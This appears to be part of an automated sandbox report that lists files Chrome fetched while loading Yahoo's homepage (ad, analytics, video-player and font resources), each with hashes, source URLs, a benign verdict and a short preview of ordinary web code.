                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):65865
                                                                                                                                                                                                                  Entropy (8bit):5.208359994763881
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:BD4D30BF2431199179FA9AFBDB1CCB76
                                                                                                                                                                                                                  SHA1:2D9EDBDAAB2CE633D3B826EC363AA98A8894900D
                                                                                                                                                                                                                  SHA-256:08C8E3BFE30297FB8AEEE20FC667F6F18AC7F19C49B4987CDD81078BCE8A2100
                                                                                                                                                                                                                  SHA-512:8BF97C1FEA028DAF20BDCA75591C40AF307078DA2502C6F0F2F951DC9573859B8744F3F9430B110F36ADF8589639B214AA6E5086987D0518A0D6E932F9FE2886
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/cx/hp-viewer/desktop_1.11.185.modern.js
                                                                                                                                                                                                                  Preview:!function(){"use strict";const e=["finance.yahoo.com","news.yahoo.com","sports.yahoo.com"],t=new RegExp(/rs="([^"]*)"/),i={lmsid:"lmsid",lpstaid:"lpstaid",lu:"lu",pct:"pageContentType",pd:"pageDesign",pl:"pl",pt:"pageType",revsp:"revsp",ver:"appName"},s=["ctopid","hashtag","wiki_topics"],n=["defaultLREC","lighthouse","spotlight","bankratewidget"],o=["pd","pt","pct","lmsid","lpstaid","hashtag","pstaid"],a={att:"yhp",autos:"yautos",entertainment:"yent",finance:"yfin",fp:"yhp",gma:"ynews",lifestyle:"ylife",movies:"ymov",music:"yent",news:"ynews",sports:"ysports",style:"ylife",tech:"ytech"},r={hashtag:!0,lang:!0,region:!0,site:!0,spaceid:!0},c=["lmsid","lpstaid","pt","pd","ver","pct"],d=["sda-COMMENTSWFPAD-iframe"];const l=e=>new Promise((t=>setTimeout(t,e))),h=(e,{className:t,id:i,tagName:s})=>{if(e)return t&&!e.classList.contains(t)||i&&i!==e.id||s&&e.tagName!==s?h(e.parentElement,{className:t,id:i,tagName:s}):e},w=t=>{if(!t||t.startsWith("/"))return t;const{hostname:i,pathname:s}=new UR
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, WAVE audio, IEEE Float, stereo 44100 Hz
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):149336
                                                                                                                                                                                                                  Entropy (8bit):7.496490218548733
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:8F1C7F5187E8E78FDB31A5E6C688E803
                                                                                                                                                                                                                  SHA1:64B1EF52851B1C5B130BD7FC12576329D1738F0D
                                                                                                                                                                                                                  SHA-256:0598E13041B04BD01DC5E5849ABEBAC0E253BBAC3EC6BDC71CA62B84100717F4
                                                                                                                                                                                                                  SHA-512:B5F744E0AF9D4736B542060471404E074FCA5769FFEBEF2BECD0A311329BAE985B97FFB52247E571EE0C2A9B7A99CB3FD5D91F21BD807A09D0A45FB651D12217
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/pv/static/misc/voice-close-202105050733.wav:2f823ded200643:0
                                                                                                                                                                                                                  Preview:RIFFPG..WAVEfmt ........D... b.... .data.....r.6.>.7..6!'.7...5...7BU...O.7...FE.7D...7Ud...MQ7.;J.7&.7..t.j..6. ....)6m...x..O...?..eH..........7.5....m.........P..........L...%J....9...u,.........H=......H=..j0..>....3...Y.......+..Ud........ ..>..G".M..r.".....!.....s......FE...v......._..~....Pz..L....O.....r.".....k..5......y............5m..?.6.....6&.`.|.$7..-..MQ7.>..{7...._.7....v.7.k.6..7.\.6y..7..7..7$.<7D..7k.j7...7..7...7m.7...8.n.7 ..8...7...8.~.79..8k..7.x.8.1.74i.8...8...84i.8.+.8Q..8...7...8...7...8k..7~..8...7._.8...7...8G..7o..8...7[..8Ud.7C..8.L.7...8..o7.C.7j.E7.>.7A..7H..70F.6.@.7..6j..7BU.5.O.7Ud..m.7..~.. .7.!..>s7.~..~.H7..=.K..7D.e.0F.6......6#R.....5.J......&..............`...w...?0.h8!..".;.O.;i..<7..<+L.<..<.(.<...<...=6#.=..9=.\:=J.T=F.U=.:h=..h=..s=..t=.x=..y=..y=+Rz=Kzw=p.x=\.o=QMp=..d=..d=..\=.e]=..d=.Xe=.Q~=..~=...=.g.="{.=..=..=.#.=N.=.(.=4.=.1.=...=.i.=...={..=p.=.,.=[..=..=.O.=...=.e.=J.=...=...=...=
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1748)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):3596
                                                                                                                                                                                                                  Entropy (8bit):5.444209745064718
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D92FD68178888768C733A4365A56FC3D
                                                                                                                                                                                                                  SHA1:55916ED75FD5C9DF0A7447298E2BCA559CC9583A
                                                                                                                                                                                                                  SHA-256:E573D7D4E3679F1D578E544C5B807AA4FF21E208BAF12E48AA0D09B2B3938F04
                                                                                                                                                                                                                  SHA-512:37CAEE932A7038636D84720960420E701C7659C873188CA400EE0196868D9C5A09BB31F566699ACF54DB0F0FC42BD769F1A141A213C2127C38CE839DACCA8BE5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://securepubads.g.doubleclick.net/pagead/js/car.js
                                                                                                                                                                                                                  Preview:/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var e=this||self;/* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ .var f={};function g(){if(f!==f)throw Error("Bad secret");};function h(a){return Object.isFrozen(a)&&Object.isFrozen(a.raw)}function k(a){return a.toString().indexOf("`")===-1}const l=k(a=>a``)||k(a=>a`\0`)||k(a=>a`\n`)||k(a=>a`\u0000`),m=h``&&h`\0`&&h`\n`&&h`\u0000`;let n=globalThis.trustedTypes,p;function q(){let a=null;if(!n)return a;try{const b=d=>d;a=n.createPolicy("goog#html",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){throw b;}return a};var r=class{constructor(a){g();this.g=a}toString(){return this.g+""}};function t(a){p===void 0&&(p=q());var b=p;return new r(b?b.createScriptURL(a):a)};var v=class{constructor(a){g();this.h=a}toString(){return this.h}};new v("about:blank");new v("about:invalid#zClosurez");const w=[];var x=a=>{console.warn(`A URL with content '${a}' was sanitized away.`)};w.ind
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17320), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17320
                                                                                                                                                                                                                  Entropy (8bit):5.756027257143914
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:2FDF3E79D5E851201A0D52A886453D8B
                                                                                                                                                                                                                  SHA1:0CCA49213DC761C62B82C185E3A7C597CBE47515
                                                                                                                                                                                                                  SHA-256:12B5EACCD8A9D81A6A12512566D2B72AA7C100B4A261A08EE6AAE4679A9E36B4
                                                                                                                                                                                                                  SHA-512:42C03ECEAE90964D9A6DD5999ADC52E5A1899D549B71966881EC43CD3BAAA79A188A8E50212AE720B8C85C094EC06DB09461D7C4E349BD53E526811BC3C0979D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:function _createForOfIteratorHelper(b,t){var e="undefined"!=typeof Symbol&&b[Symbol.iterator]||b["@@iterator"];if(!e){if(Array.isArray(b)||(e=_unsupportedIterableToArray(b))||t&&b&&"number"==typeof b.length){e&&(b=e);var c=0,m=function b(){};return{s:m,n:function t(){return c>=b.length?{done:!0}:{done:!1,value:b[c++]}},e:function b(t){throw t},f:m}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}var W=!0,d=!1,n;return{s:function t(){e=e.call(b)},n:function b(){var t=e.next();return W=t.done,t},e:function b(t){d=!0,n=t},f:function b(){try{W||null==e.return||e.return()}finally{if(d)throw n}}}}function _unsupportedIterableToArray(b,t){if(b){if("string"==typeof b)return _arrayLikeToArray(b,t);var e=Object.prototype.toString.call(b).slice(8,-1);return"Object"===e&&b.constructor&&(e=b.constructor.name),"Map"===e||"Set"===e?Array.from(b):"Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamp
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4301)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):4366
                                                                                                                                                                                                                  Entropy (8bit):5.114587794308763
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:CD0AD2D50A7E4A574B8D749F22E2FFB1
                                                                                                                                                                                                                  SHA1:6CCC3309390A8C2F27975FDEC712ADF7B26DB9AF
                                                                                                                                                                                                                  SHA-256:E1897197C32BE441C5C75426C1DF80241EAFCEB7B8A3027CD40A148A809870FF
                                                                                                                                                                                                                  SHA-512:C61F8388912AF72D5711D9C595A51F43F793EC704544B869A738CAF25B051C0E68DB807E5E392F27A3D31544FCD05A15956FF73E02D4A043A386E23AEB8241AB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://players.brightcove.net/videojs-overlay/3.0.0/videojs-overlay.min.js
                                                                                                                                                                                                                  Preview:/*! @name videojs-overlay @version 3.0.0 @license Apache-2.0 */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e(require("video.js")):"function"==typeof define&&define.amd?define(["video.js"],e):(t="undefined"!=typeof globalThis?globalThis:t||self).videojsOverlay=e(t.videojs)}(this,(function(t){"use strict";function e(t){return t&&"object"==typeof t&&"default"in t?t:{default:t}}var s=e(t);const i={align:"top-left",class:"",content:"This overlay will show up while the video is playing",debug:!1,showBackground:!0,attachToControlBar:!1,overlays:[{start:"playing",end:"paused"}]},n=s.default.getComponent("Component"),o=s.default.dom||s.default,r=s.default.registerPlugin||s.default.plugin,h=t=>"number"==typeof t&&t==t,a=t=>"string"==typeof t&&/^\S+$/.test(t);class d extends n{constructor(t,e){super(t,e),["start","end"].forEach((t=>{const e=this.options_[t];if(h(e))this[t+"Event_"]="timeupdate";else if(a(e))this[t+"Event_"]=e;else if("start"===t)throw new E
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 560x272, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40252
                                                                                                                                                                                                                  Entropy (8bit):7.961299233824864
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:077C72AABCF01E83FDF1BF67B82FCE82
                                                                                                                                                                                                                  SHA1:625AD5FC31226C05794627BF129F3DECE72B66F2
                                                                                                                                                                                                                  SHA-256:B92234CF409CDE068D4F4B0250FFEF1BF37CCC518C4D4878961F5E0DC25F11BA
                                                                                                                                                                                                                  SHA-512:8304AA85FE75C4E7BE2C30AAF5F0E4DA0E35729FC7EBE231C93FDC2F50BE0CAF640D7102BA5D3D26B2EAB83B5E63FA5467E563967FC04D8966653987885EE7CB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF.............4ICC_PROFILE......$appl....mntrRGB XYZ ...........9acspAPPL....APPL...........................-appl...g.F.K.Dn..u.................................desc.......ecprt...d...#wtpt........rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... desc........Display P3..................................................................................text....Copyright Apple Inc., 2015..XYZ .......Q........XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......P........sf32.......B.......&.......................n...C....................................................................C.........................................................................0.............................................J..........................!1A..Qa."q..2..#B...R..3br....$....%c..DSd.....................................0........................1..!"2AQ..a.#3BRq.$.5C............?.C.....=....3.....h.ol.[K.kd.].....9.{.....1.^.G....m
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (5503), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):5503
                                                                                                                                                                                                                  Entropy (8bit):5.376984635806113
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:19720D3A285ABA8024B11FC9955795FE
                                                                                                                                                                                                                  SHA1:8E174FF6003772BC71FFAF2B655E23FC4B8794CA
                                                                                                                                                                                                                  SHA-256:00A54A79B12A7E6DC344AE20DEA91F7772A088C14CF9B12D4DD8CEFF8B374C11
                                                                                                                                                                                                                  SHA-512:B296C7311263B3B153353904B0D65131ED72F70F9A646795C07CE8DD3735329A6D6AAD99BD1C0F74742FC9E515D7CA1E78F44377EBBA55018331A986C93481A0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://opus.analytics.yahoo.com/tag/opus-frame.html?referrer=https%3A%2F%2Fwww.yahoo.com%2F&tbla_id=497be9a1-bf56-4553-8c1f-c865ea1881fd-tuctdf983ae&axids=gam%3Dy-wJdztNxE2uKgQJPikwxcv.8wfHXIhaMl~A%26dv360%3DeS1HOE1rQmVGRTJ1Rm9nZ2xUMGNONHpVRi5sTE1kT3hvMn5B%26ydsp%3Dy-xEitYIZE2uLEfAm.JyBCbId89JQY9.yS~A%26tbla%3Dy-wcOIMOZE2uLGQNDzUY8ZIIeOg7Ymx3LD~A&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN&reset_idsync=1
                                                                                                                                                                                                                  Preview:<!DOCTYPE html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="viewport" content="width=device-width,initial-scale=1"><script defer="defer">(()=>{"use strict";var t=function(t){if(t)return t;try{return document.location.hostname.match(/[\w]+\.([\w]+|co.uk)$/)[0]}catch(t){return""}};const e=function(e,n,r,o){(o||window.document).cookie="".concat(e,"=").concat(n,";Max-Age=").concat(31536e3,";Domain=").concat(t(r),";path=/;Secure;SameSite=None")},n=function(t){return new URLSearchParams(document.location.search.slice(1)).get(t)||""};var r,o=function(){var t=new Date("January 1, 2011 00:00:00 GMT").getTime()/1e3,e=(new Date).getTime()/1e3;return parseInt((e-t)/60/60,10)};!function(t){if(r&&!t)return r;var e=function(t){return parseInt(t,36)};r={};var n=function(t,e){for(var n="".concat(t,"="),r=(e||window.document).cookie.split(";"),o=0;o<r.length;o++){var a=(r[o]||"").trim();
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 65176, version 1.0
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):65176
                                                                                                                                                                                                                  Entropy (8bit):7.996782865840981
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:B4DF4FCE99E5A3C3D1493112A0159071
                                                                                                                                                                                                                  SHA1:D6CE384A32EC1D859406D6E4EBE3FE547DB3B82A
                                                                                                                                                                                                                  SHA-256:C77AC0AA1AA3C9715CACB1FC76FEAF226E30927A9636E5C75C4DFEB75C0F8F98
                                                                                                                                                                                                                  SHA-512:AF1F4EFF0DEB18BA2628D82BB6CA16D6340DC797A438B13F29929DB1548155F82FD1840D18C275438F5EC251A6E82670E2FF89477F1334E1CD45422E02E8EEDC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/cv/apiv2/ngy-fonts/YahooSans-VF-Web.woff2
                                                                                                                                                                                                                  Preview:wOF2..............^....*........................../......z?HVAR.w.`?STAT..../d......O..6.0..F.6.$..f. ..|..9[.G....h,j+n..mD.gn.V....<..c1=..2..~.....v.^........%..[3.......f..f..?.aD.......y..T..;O.s~.......r~{.?..t.v. .D.K_...tV...7.J..-2.:F.DDD....;.j.....uRh.e<.(..JD..g.SE..6<...4..{Q....4a!..D...)`..B5..%.9..%a.....ga..2z.l....J......l.*...y"[.W ..,# .*gL.3~..Y.S.sx..7.b*....TAT..!..~6<..`....|E...S.W.|7..^.a....%2.KJ.Iu;...Z3".|.!..D..!,.S.."W]z..O.>..`r...PJ,.9)D..k<n.@.%..^N...b...`.E..w.#........SE.'..M.vG.e'.2.._......m....w494.._........~.}N...^h...QmF.;.~U...q.........u.Q....p.5.l.(...U.~.....5c.3q:..[S..s.y..(J...V.....bc.haTY.Qg..W.V\xQi......g.....'\.o.".....=..BI..A.d|....7'&.!...o..5D;K..W<tJ j..Cs+..%.&.0.........>N.1...).aP..G.co..6...s.c.....?6..&Q...`lx_.)....0u.....}.1...6..&mv...D&....M.. .L..aXDd.D.)Md...I.AL.I....5}.-./n3.tS..5.q..%.~.r^h.e.n./..CJ69... .......T..g.....}.3.z....%.7.":%......'Z4\.....0....M?.NE.8)ZjHVr.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):48
                                                                                                                                                                                                                  Entropy (8bit):5.011842188131014
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:B57AFFECA82E6DD5690C752A3C2E52E4
                                                                                                                                                                                                                  SHA1:92C11AE719062227B89D116344B1F40FD4742B36
                                                                                                                                                                                                                  SHA-256:12522C2F6DD37D90D5026A91649FF9EDD3AAD9D44E56A7AA545BBCE57BB5AFE7
                                                                                                                                                                                                                  SHA-512:5C746C74F9B2899D45D95F8AAFBE34770F7DAFFB778B98C9E7213F300371C5673E4D3C7DF60078585D0EDA4A8B70E3DD103E44D826ABE2F1DE24F28ADA59471E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://ups.analytics.yahoo.com/ups/58834/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN
                                                                                                                                                                                                                  Preview:{"axid": "y-wcOIMOZE2uLGQNDzUY8ZIIeOg7Ymx3LD~A"}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3781)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):3782
                                                                                                                                                                                                                  Entropy (8bit):4.7189732543631795
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D4D5F0CA914CB06961C85BFC973D287D
                                                                                                                                                                                                                  SHA1:4345EA82F9C943207A0E7CB16E1F642135180C1B
                                                                                                                                                                                                                  SHA-256:1E9800CC0260AD3AF16A4071D016EEA717CF5813F3F43F286380F8045C1DECC3
                                                                                                                                                                                                                  SHA-512:A8577E86D145B1F82B56FF450653CCF0246AAF34989A0CF00618CACBDCF798D327389F0321B3A1D32F258BF6A9638F7A50BD441D4BDBA95BC092E5BFECF6C261
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://players.brightcove.net/videojs-ima3/5.4.8/videojs-ima3.css
                                                                                                                                                                                                                  Preview:.vjs-ad-playing.vjs-ad-playing .vjs-progress-control{pointer-events:none}.vjs-ad-playing.vjs-ad-playing .vjs-play-progress{background-color:#ffe400}.vjs-ad-playing .vjs-captions-button{display:none}.vjs-ad-playing .vjs-audio-button{display:none}.vjs-ad-loading .vjs-loading-spinner{display:flex;justify-content:center;align-items:center;animation:vjs-spinner-show 0s linear .3s forwards}.vjs-ad-loading .vjs-loading-spinner:before,.vjs-ad-loading .vjs-loading-spinner:after{animation:vjs-spinner-spin 1.1s cubic-bezier(0.6, 0.2, 0, 0.8) infinite,vjs-spinner-fade 1.1s linear infinite}.vjs-ad-loading .vjs-loading-spinner:after{animation-delay:.44s}.vjs-ad-loading .vjs-big-play-button,.vjs-ad-loading .vjs-poster,.vjs-ad-content-resuming .vjs-big-play-button,.vjs-ad-content-resuming .vjs-poster{display:none}.vjs-ima3-ad-container{bottom:0;left:0;position:absolute;right:0;top:0;pointer-events:none}.vjs-ima3-html5 .vjs-ima3-ad-container>*,.vjs-ima3-html5 .vjs-ima3-ad-container>* iframe{width:100%
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):2932
                                                                                                                                                                                                                  Entropy (8bit):4.821189188225222
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:0EF42A67AEC0F7C34642D374A2B10FE8
                                                                                                                                                                                                                  SHA1:110FD90EA16F09A6229418E2C754BB200CA0A420
                                                                                                                                                                                                                  SHA-256:E475589F859892FDF87D7AB343F0D0014171416E852EE65664D0DA44CEE5569A
                                                                                                                                                                                                                  SHA-512:FD12D0259AD116CC6F2A8A1AAFC42B5259661B71F1F4099E736BF5D8FB09E6A2DFA45744B9C5725402BE60A628FAB4F99E92BA3A56072C052D1D8274819AFDD0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://pm-widget.taboola.com/yahooweb-network/load.js
                                                                                                                                                                                                                  Preview:..if (typeof _tb_dis === 'undefined' || _tb_dis === null) {. var _tb_dis = false;.}.if (!_tb_dis) {. var pm_ppy = "yahooweb-network";.. var _pmep = '//pm-widget.taboola.com/';. var _pmep_geo = '//pm-widget.taboola.com/';. if (document.URL.indexOf('https://') > -1) {. _pmep = _pmep.replace(/88\//gi, '90/');. _pmep_geo = _pmep_geo.replace(/88\//gi, '90/');. }. var _pmpmk = pm_ppy + '/pmk-20220605.1.js';. var _pmasync = true;. var _pmoptimization = true;. var _pmoptimizationmanipulation = true;. var _pmhp = false;. var _pmsb = false;.. function _pmloadfile(fileName) {.. if (_pmasync) {. var js, elements = document.getElementsByTagName("head")[0];. js = document.createElement("script");. js.setAttribute("type", "text/javascript");. js.setAttribute("src", fileName);. js.setAttribute('async','');. js.setAttribute('crossorigin', 'anonymous');. elements.appen
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2942)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):432919
                                                                                                                                                                                                                  Entropy (8bit):5.538516602940182
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:4C71CD8A343BD6122B4C2D70A5B34FBB
                                                                                                                                                                                                                  SHA1:20F85D15F9950DB1E2D06A76ED8334F41C50C720
                                                                                                                                                                                                                  SHA-256:98CC156B03820740AE172F00DA45848EFBC175B3FEA3757CC58AC5E3D25B23ED
                                                                                                                                                                                                                  SHA-512:2A7832BF4D3F43EF41D7CF220E83896E6731FB403F5A453EE07655AF9F8BF2685FDB096BCCF84508BE7912AE45D78E8F5CCFE335BF400E700B7B8BB8FBD41CCA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:// Copyright 2011 Google Inc. All Rights Reserved..(function(){var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},da=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},ea=da(this),r=function(a,b){if(b)a:{var c=ea;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.r("Symbol",function(a){if(a)return a;var b=function(f,g){this.g=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.g};var c="jscomp_sy
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (48645)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):814053
                                                                                                                                                                                                                  Entropy (8bit):5.533448517143587
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:81E0ECB8FD31262E836B94A633F9C2C1
                                                                                                                                                                                                                  SHA1:0D59244F2B7934A60760F18451625C95D6E8C2AA
                                                                                                                                                                                                                  SHA-256:7A599DCEB24B5DC8E682A26B0DFC763629CCC66CE22D7D2F04558E6CA5AE9FC5
                                                                                                                                                                                                                  SHA-512:E1B7AD394E37BD870F86D8C63EF8CDD6A4ED9C37E85C7FEF723342CA8201157C29EB5560AB72B9555D2DD4CC82B016B392335AD213EFE990459055992CBEA264
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://imasdk.googleapis.com/js/core/bridge3.670.0_en.html
                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html class="ima-sdk-frame">. <head>. <title></title>. <style type="text/css">.videoAdUiActionCta{position:absolute;bottom:30px;-webkit-box-sizing:border-box;box-sizing:border-box;padding:5px;max-width:75%}.uac-android-on-3p-instream.videoAdUiActionCta,.uac-ios-on-3p-instream.videoAdUiActionCta{background:linear-gradient(to top,rgba(0,0,0,0),rgba(0,0,0,.4) 100%);bottom:unset;max-width:100%;padding:12px;top:0;width:100%}.newProgressBarVariant .videoAdUiActionCta{bottom:46px}.videoAdUiActionCtaInset{font-family:arial,sans-serif;font-weight:500;font-size:16px;background:white;display:-webkit-box;display:-moz-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-ms-flex-direction:row;-webkit-flex-direction:row;flex-direction:row;-webkit-border-radius:8px;-moz-border-radius:8px;border-radius:8px;-webkit-box-shadow:0 1px 3px rgba(60,64,67,.5);-moz-box-shadow:0 1px 3px rgba(60,64,67,.5);box-shadow:0 1px 3px rgba(60,64,67,.5);overflow:hidden;height:50px;pointer-even
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):13282
                                                                                                                                                                                                                  Entropy (8bit):7.952604819650938
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:359070CBE0BD2ECDDD72A70A0FE295B2
                                                                                                                                                                                                                  SHA1:EDD7F9C9014E73676A08988A7BFE89E74BE6A898
                                                                                                                                                                                                                  SHA-256:0E281C3516453CB4BAF1645546B3BB751FC9B81332231A301DAB8ECE60490916
                                                                                                                                                                                                                  SHA-512:634F951AE31424B2BE65022243BFA1ABB01A73D9CED34A2DF49389606AEFF51236234474208BA31B7D4D32C2F47A5834ED4EB801E8B9DDE3831606D1970ADBA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/5s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/5s/match/image.jpeg*~hmac=30a34176bec28718850fab2edf58bcfbe91d1cf05ee095865ef74bad94bc52c1
